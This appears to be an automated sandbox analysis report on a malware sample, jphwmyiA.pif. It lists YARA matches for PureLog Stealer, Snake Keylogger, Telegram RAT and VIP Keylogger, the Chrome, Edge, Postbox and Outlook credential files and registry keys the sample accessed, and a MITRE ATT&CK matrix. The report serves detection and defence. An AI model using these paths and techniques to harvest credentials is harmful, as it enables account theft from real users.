                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3761815034.00000000221C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3761096680.0000000023881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3760427867.000000001D271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Yara detected Snake Keylogger
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C1D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000227E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.0000000021121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR
                  Yara detected VIP Keylogger
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.23660000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.3.jphwmyiA.pif.1f2f18e0.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be4a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1be499de.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jphwmyiA.pif.20d8a8c6.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.jphwmyiA.pif.22770ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.3.jphwmyiA.pif.207aee58.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 15.2.jphwmyiA.pif.1e710000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000013.00000003.2330601115.00000000207AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000003.2260610637.000000001A4A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758852634.0000000022770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000003.2131092317.000000001F2F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3757907587.0000000020D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3763827438.000000001E710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3765669211.0000000024C70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3758412970.0000000022509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.3759044555.00000000228EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3758305974.000000001C285000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762971670.0000000023660000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3757413723.000000001BE09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3759975786.00000000211F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.3764652737.000000001ED60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.3762852858.0000000023600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7208, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 7820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jphwmyiA.pif PID: 8016, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information22
                  Scripting                  		1
                  Valid Accounts                  		1
                  Native API                  		22
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		1
                  Web Service                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Shared Modules                  		1
                  DLL Side-Loading                  		1
                  Valid Accounts                  		11
                  Deobfuscate/Decode Files or Information                  		LSASS Memory1
                  System Network Connections Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		13
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution                  		1
                  Valid Accounts                  		1
                  Access Token Manipulation                  		3
                  Obfuscated Files or Information                  		Security Account Manager2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		11
                  Encrypted Channel                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter                  		1
                  Registry Run Keys / Startup Folder                  		312
                  Process Injection                  		3
                  Software Packing                  		NTDS36
                  System Information Discovery                  		Distributed Component Object ModelInput Capture1
                  Non-Standard Port                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		1
                  Timestomp                  		LSA Secrets1
                  Query Registry                  		SSHKeylogging3
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials241
                  Security Software Discovery                  		VNCGUI Input Capture234
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
                  Masquerading                  		DCSync41
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts                  		Proc Filesystem3
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
